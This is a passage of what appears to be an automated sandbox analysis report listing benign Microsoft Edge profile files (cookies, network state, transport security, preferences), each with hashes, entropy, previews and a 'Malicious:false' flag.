                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.7784104991694236
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:tTa49agrAF8DXSxbO+m8UwEIo10Xcf0L/ZJVb:Va44jF8DXYbO+mr5IE0XI0LhJVb
                                                                                                                                                                                                                                                                                                MD5:DCF75500C9EB41AA7643BAE9B2B11808
                                                                                                                                                                                                                                                                                                SHA1:FCA09623316842525591EBA692C9941D7C5126B8
                                                                                                                                                                                                                                                                                                SHA-256:A48D3F98F95D06F698134FF8B0867685CFC3516710BF925A4C919FBB09CA2940
                                                                                                                                                                                                                                                                                                SHA-512:FA0C7BC2704A0FCCA626B6FDEBC2B6E9FCD1972A27AB4B0FC63E50094BF1B4B6E2A2C7F6E224181F78458DC3DF6CD21B9E243D62F3273596D30E6E4B5AE4D7B4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF250c6.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF337ab.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.1089608215913973
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:T2fIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9+:ifIEumQv8m1ccnvS64r
                                                                                                                                                                                                                                                                                                MD5:807AF814820C44ABBB4D5C70C8D262A0
                                                                                                                                                                                                                                                                                                SHA1:28EE6EECBF3094B8142A309D8B71DF4B437121D2
                                                                                                                                                                                                                                                                                                SHA-256:33C42DE9193C5FBEA4D4CA2931C0F4C82593E97890D7AC4ED643471C2B2B1E28
                                                                                                                                                                                                                                                                                                SHA-512:402A9B1C7A9BC4810B10FED805CDC21286D760239A2C0AB81431346C53F3905868FEE58C250C98B3074ACCA77E944B7D99A93D597D8F9C3ED3DC21404CC053D3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF22773.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF245c9.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                                MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                                SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                                SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                                SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF250c6.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):203
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                                MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                                SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                                SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                                SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                                SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                                SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                                SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a46f8917-a691-4dd3-95f5-e9b9424360e6.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a5d515ac-fe0d-466f-bd3d-4504e8a1541d.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\cb613135-e235-4699-815e-4fae7ebe34a0.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1646
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.282413481956607
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YXsiJ8s1fcds/leebsBgns8/CgHYs8/CgH7JbZ:KJpLkecw/TaT7J1
                                                                                                                                                                                                                                                                                                MD5:64A3D6893C32A64409CA9A2D3248AB1A
                                                                                                                                                                                                                                                                                                SHA1:6572095CC78C44876F337A24B7A717C60A3025D8
                                                                                                                                                                                                                                                                                                SHA-256:C987E590B6BE3CC49330D9A3A9DDD6812A93F7FC86DCD38DBAE7D88DD5EF63F3
                                                                                                                                                                                                                                                                                                SHA-512:FA61D7B3FBEACCFCBFACD04507EF66B1C6A2FA9EC1926BA8F2B05515044ACE867B5E2A13F3BF19A0D2B609C02CE9D89F80CC562CBDC8974D40DD362FD56D3BDA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543017056017","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543021339088","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386044627113817","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543029085424","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://w

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ce0be1e7-7a3a-4a25-a284-549855bdaf55.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                                MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                                SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                                SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                                SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dc6c9f0a-a923-4eab-97fc-44ba4eeb4eb3.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.6852315298663104
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:TLiOUOq0afDdWec9sJEpMl741miI7J5fc:TOOUzDbg39pMldc
                                                                                                                                                                                                                                                                                                MD5:19F8A237057D855585E293B39C348D63
                                                                                                                                                                                                                                                                                                SHA1:6DFC800D2C67A332B72884BDDEDE8A231EAEB35F
                                                                                                                                                                                                                                                                                                SHA-256:86E8C808D16056DAFA4449DE639D0C5F372B654C319516D5FC598DDD7FC4045E
                                                                                                                                                                                                                                                                                                SHA-512:FFD7FDF11BC4C78963D8420DE2E1BDCC611ADB93FE5F9D094BBE1C79D1E1A4D0CD3A95EF60760A6BFB719170DBD0DE1929AB28D0268E7A02B489E0F84E71078B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9510
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947106727321153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:sVWckdptD2RJ156b9xzwaYCLsd85Th6mp9/x+6M8muec5m1eAeCAe4zvrU2iHQyP:sVhkdpqJj4waYCLC8Rpj+FimQAqU9df
                                                                                                                                                                                                                                                                                                MD5:5B58B774AA294D703013BE6937DE2677
                                                                                                                                                                                                                                                                                                SHA1:B8EB6031D94AEAD3393856100DFDB3104192D604
                                                                                                                                                                                                                                                                                                SHA-256:6A425C879B20CA44DE9C9B60EB4B7E0D80C4D102A29C3E514D231FDE405FB7CA
                                                                                                                                                                                                                                                                                                SHA-512:225F00E6637D933646D1DDA56DC58630CBD9DCBA1217C3305E9B321CB7C3DDC71093E2F840092694A0B52CC51FC96FB87CE15755DF4724573DF61D00FFA25D0C
                                                                                                                                                                                                                                                                                                Malicious:false
